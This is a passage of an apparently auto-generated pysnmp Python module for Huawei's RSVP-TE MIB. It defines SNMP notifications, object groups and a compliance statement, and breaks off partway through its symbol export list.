hwRsvpTeIfName = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 5), DisplayString()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfName.setStatus('current')
hwRsvpTeTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2))
hwRsvpTeHelloLost = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 1)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeHelloLost.setStatus('current')
hwRsvpTeHelloLostRecovery = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 2)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeHelloLostRecovery.setStatus('current')
hwRsvpTeAuthFail = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 3)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeAuthFail.setStatus('current')
hwRsvpTeAuthSuccess = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 4)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeAuthSuccess.setStatus('current')
hwRsvpTeIfNbrThresholdExceed = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 5)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrCurrentCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThreshold"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCount"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrThresholdExceed.setStatus('current')
hwRsvpTeIfNbrThresholdExceedClear = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 6)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrThresholdExceedClear.setStatus('current')
hwRsvpTeIfNbrTotalCountExceed = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 7)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCount"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrTotalCountExceed.setStatus('current')
hwRsvpTeIfNbrTotalCountExceedClear = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 8)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrTotalCountExceedClear.setStatus('current')
hwRsvpTeConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2))
hwRsvpTeGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1))
hwRsvpTeSessionGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 1)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionSenders"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionReceivers"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionRequests"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionTunnelId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionTunnelExtId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionLspsNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionStyle"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeSessionGroup = hwRsvpTeSessionGroup.setStatus('current')
hwRsvpTeSenderGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 2)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderHopAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderHopLih"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderInterface"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecPeakRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecBurst"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecMinTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecMaxTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderRsvpHop"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderPolicy"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecBreak"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecHopCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecPathBw"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecMinLatency"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecMtu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedSvc"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedBreak"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedCtot"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedDtot"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedCsum"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedDsum"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedHopCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedPathBw"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedMinLatency"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedMtu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadSvc"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadBreak"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadHopCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadPathBw"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadMinLatency"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadMtu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeLspId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdSndFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdSndEpoch"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdSndNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdRcvFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdRcvEpoch"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdRcvNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderClassType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestCtype"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestL3pid"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMinVpi"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMinVci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMaxVpi"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMaxVci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestFrMinDlci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestFrMaxDlci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrSetupPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrHoldPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrName"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrExcludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrIncludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrIncludeAll"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrSetupPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrHoldPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrHopLimit"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrBandwidth"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrExcludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrIncludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrIncludeAll"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrInuseFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderDiffServPsc"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeSenderGroup = hwRsvpTeSenderGroup.setStatus('current')
hwRsvpTeResvGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 3)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvSenderAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvSenderAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvHopAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvHopLih"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvInterface"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvService"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecPeakRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecBurst"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecMinTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecMaxTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvRSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvRSpecSlack"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvScope"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvShared"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvExplicit"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvRsvpHop"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvPolicy"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvConfirm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeResvGroup = hwRsvpTeResvGroup.setStatus('current')
hwRsvpTeResvFwdGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 4)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdSenderAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdSenderAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdHopAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdHopLih"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdInterface"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdService"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecPeakRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecBurst"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecMinTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecMaxTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdRSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdRSpecSlack"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdScope"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdShared"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdExplicit"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdPolicy"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdMsgIdFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdMsgIdEpoch"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdMsgIdNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdRsvpHop"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeResvFwdGroup = hwRsvpTeResvFwdGroup.setStatus('current')
hwRsvpTeIfGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 5)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfUdpNbrs"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfIpNbrs"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrs"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRefreshBlockadeMultiple"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRefreshMultiple"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRefreshInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRouteDelay"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfUdpRequired"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfStatus"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfHelloEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfSrefreshEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfSrefreshInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRetranIncDelta"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRetranInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthEncrypted"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthHandshake"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthKey"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfWindowSize"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthLifeTime"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeIfGroup = hwRsvpTeIfGroup.setStatus('current')
hwRsvpTeNbrGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 6)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloSrcInstance"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloDstInstance"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloLostCounter"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrSendersNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrReceiversNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrCapability"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrRestartTime"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrRecoveryTime"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrStatus"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrAuthKeyId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrReductionEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrReliabilityEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrProtocol"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeNbrGroup = hwRsvpTeNbrGroup.setStatus('current')
hwRsvpTeMessageIdGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 7)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdFlag"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeMessageIdGroup = hwRsvpTeMessageIdGroup.setStatus('current')
hwRsvpTeFilterSpecGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 8)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecLspId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecIngressLsrId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecLabel"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeFilterSpecGroup = hwRsvpTeFilterSpecGroup.setStatus('current')
hwRsvpTeRroGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 9)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroIpAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroIpPrefixLen"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroLabel"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroFlag"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeRroGroup = hwRsvpTeRroGroup.setStatus('current')
hwRsvpTeEroGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 10)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroIpAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroIpPrefixLen"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeEroGroup = hwRsvpTeEroGroup.setStatus('current')
hwRsvpTeTrapObjectsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 11)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrCurrentCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThreshold"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeTrapObjectsGroup = hwRsvpTeTrapObjectsGroup.setStatus('current')
hwRsvpTeTrapGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 12)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeHelloLost"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeHelloLostRecovery"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeAuthFail"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeAuthSuccess"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThresholdExceed"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThresholdExceedClear"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCountExceed"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCountExceedClear"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeTrapGroup = hwRsvpTeTrapGroup.setStatus('current')
hwRsvpTeCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 2))
hwRsvpTeCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 2, 1)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeTrapObjectsGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeTrapGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeCompliance = hwRsvpTeCompliance.setStatus('current')
mibBuilder.exportSymbols("HUAWEI-RSVPTE-MIB", hwRsvpTeIfIpNbrs=hwRsvpTeIfIpNbrs, hwRsvpTeResvFwdTSpecMaxTu=hwRsvpTeResvFwdTSpecMaxTu, hwRsvpTeSenderAdspecGuaranteedHopCount=hwRsvpTeSenderAdspecGuaranteedHopCount, hwRsvpTeMessageIdFlag=hwRsvpTeMessageIdFlag, hwRsvpTeResvFwdSenderAddr=hwRsvpTeResvFwdSenderAddr, hwRsvpTeCompliances=hwRsvpTeCompliances, hwRsvpTeIfRefreshInterval=hwRsvpTeIfRefreshInterval, hwRsvpTeIfGroup=hwRsvpTeIfGroup, hwRsvpTeSenderSessionAttrIncludeAny=hwRsvpTeSenderSessionAttrIncludeAny, hwRsvpTeResvFwdTable=hwRsvpTeResvFwdTable, hwRsvpTeGroups=hwRsvpTeGroups, hwRsvpTeRroIpPrefixLen=hwRsvpTeRroIpPrefixLen, hwRsvpTeResvFwdSenderAddrLength=hwRsvpTeResvFwdSenderAddrLength, hwRsvpTeEroTable=hwRsvpTeEroTable, hwRsvpTeIfRefreshBlockadeMultiple=hwRsvpTeIfRefreshBlockadeMultiple, hwRsvpTeNbrGrRecoveryTime=hwRsvpTeNbrGrRecoveryTime, hwRsvpTeEroIpAddr=hwRsvpTeEroIpAddr, hwRsvpTeIfRouteDelay=hwRsvpTeIfRouteDelay, hwRsvpTeSenderAdspecCtrlLoadMtu=hwRsvpTeSenderAdspecCtrlLoadMtu, hwRsvpTeSessionRequests=hwRsvpTeSessionRequests, hwRsvpTeSessionSenders=hwRsvpTeSessionSenders, hwRsvpTeSenderEntry=hwRsvpTeSenderEntry, hwRsvpTeSenderRsvpHop=hwRsvpTeSenderRsvpHop, hwRsvpTeTrapGroup=hwRsvpTeTrapGroup, hwRsvpTeIfNbrCurrentCount=hwRsvpTeIfNbrCurrentCount, hwRsvpTeNbrProtocol=hwRsvpTeNbrProtocol, hwRsvpTeMessageIdTable=hwRsvpTeMessageIdTable, hwRsvpTeRroNumber=hwRsvpTeRroNumber, hwRsvpTeSenderLabelRequestFrMinDlci=hwRsvpTeSenderLabelRequestFrMinDlci, hwRsvpTeResvFwdDestAddr=hwRsvpTeResvFwdDestAddr, hwRsvpTeIfStatus=hwRsvpTeIfStatus, hwRsvpTeResvType=hwRsvpTeResvType, hwRsvpTeSessionDestAddr=hwRsvpTeSessionDestAddr, hwRsvpTeResvEntry=hwRsvpTeResvEntry, hwRsvpTeIfAuthEncrypted=hwRsvpTeIfAuthEncrypted, hwRsvpTeRroGroup=hwRsvpTeRroGroup, hwRsvpTeSenderType=hwRsvpTeSenderType, hwRsvpTeSenderFrrIncludeAny=hwRsvpTeSenderFrrIncludeAny, hwRsvpTeSenderSessionAttrType=hwRsvpTeSenderSessionAttrType, hwRsvpTeMessageIdNumber=hwRsvpTeMessageIdNumber, hwRsvpTeSenderLabelRequestAtmMaxVpi=hwRsvpTeSenderLabelRequestAtmMaxVpi, hwRsvpTeFilterSpecIngressLsrId=hwRsvpTeFilterSpecIngressLsrId, hwRsvpTeRroEntry=hwRsvpTeRroEntry, hwRsvpTeResvFwdRSpecRate=hwRsvpTeResvFwdRSpecRate, hwRsvpTe=hwRsvpTe, hwRsvpTeResvFwdHopLih=hwRsvpTeResvFwdHopLih, hwRsvpTeNbrHelloDstInstance=hwRsvpTeNbrHelloDstInstance, hwRsvpTeSessionNumber=hwRsvpTeSessionNumber, hwRsvpTeSessionEntry=hwRsvpTeSessionEntry, hwRsvpTeSenderMsgIdSndNumber=hwRsvpTeSenderMsgIdSndNumber, hwRsvpTeIfUdpNbrs=hwRsvpTeIfUdpNbrs, hwRsvpTeResvShared=hwRsvpTeResvShared, hwRsvpTeSenderAdspecPathBw=hwRsvpTeSenderAdspecPathBw, hwRsvpTeIfRetranInterval=hwRsvpTeIfRetranInterval, hwRsvpTeFilterSpecTable=hwRsvpTeFilterSpecTable, hwRsvpTeResvScope=hwRsvpTeResvScope, hwRsvpTeNbrGroup=hwRsvpTeNbrGroup, hwRsvpTeCompliance=hwRsvpTeCompliance, hwRsvpTeSessionTable=hwRsvpTeSessionTable, hwRsvpTeNbrHelloSrcInstance=hwRsvpTeNbrHelloSrcInstance, hwRsvpTeEroType=hwRsvpTeEroType, hwRsvpTeSenderAdspecGuaranteedMinLatency=hwRsvpTeSenderAdspecGuaranteedMinLatency, hwRsvpTeAuthFail=hwRsvpTeAuthFail, hwRsvpTeSenderFrrInuseFlag=hwRsvpTeSenderFrrInuseFlag, hwRsvpTeSenderMsgIdRcvFlag=hwRsvpTeSenderMsgIdRcvFlag, hwRsvpTeResvFwdTSpecPeakRate=hwRsvpTeResvFwdTSpecPeakRate, hwRsvpTeResvService=hwRsvpTeResvService, hwRsvpTeResvPolicy=hwRsvpTeResvPolicy, hwRsvpTeNbrAuthKeyId=hwRsvpTeNbrAuthKeyId, hwRsvpTeRroLabel=hwRsvpTeRroLabel, hwRsvpTeSenderFrrIncludeAll=hwRsvpTeSenderFrrIncludeAll, hwRsvpTeSenderClassType=hwRsvpTeSenderClassType, hwRsvpTeSenderSessionAttrExcludeAny=hwRsvpTeSenderSessionAttrExcludeAny, hwRsvpTeIfAuthKey=hwRsvpTeIfAuthKey, hwRsvpTeSenderTSpecBurst=hwRsvpTeSenderTSpecBurst, hwRsvpTeIfNbrTotalCount=hwRsvpTeIfNbrTotalCount, hwRsvpTeIfNbrTotalCountExceedClear=hwRsvpTeIfNbrTotalCountExceedClear, hwRsvpTeSenderFrrExcludeAny=hwRsvpTeSenderFrrExcludeAny, hwRsvpTeResvConfirm=hwRsvpTeResvConfirm, hwRsvpTeResvDestAddr=hwRsvpTeResvDestAddr, hwRsvpTeResvFwdShared=hwRsvpTeResvFwdShared, hwRsvpTeHelloLostRecovery=hwRsvpTeHelloLostRecovery, 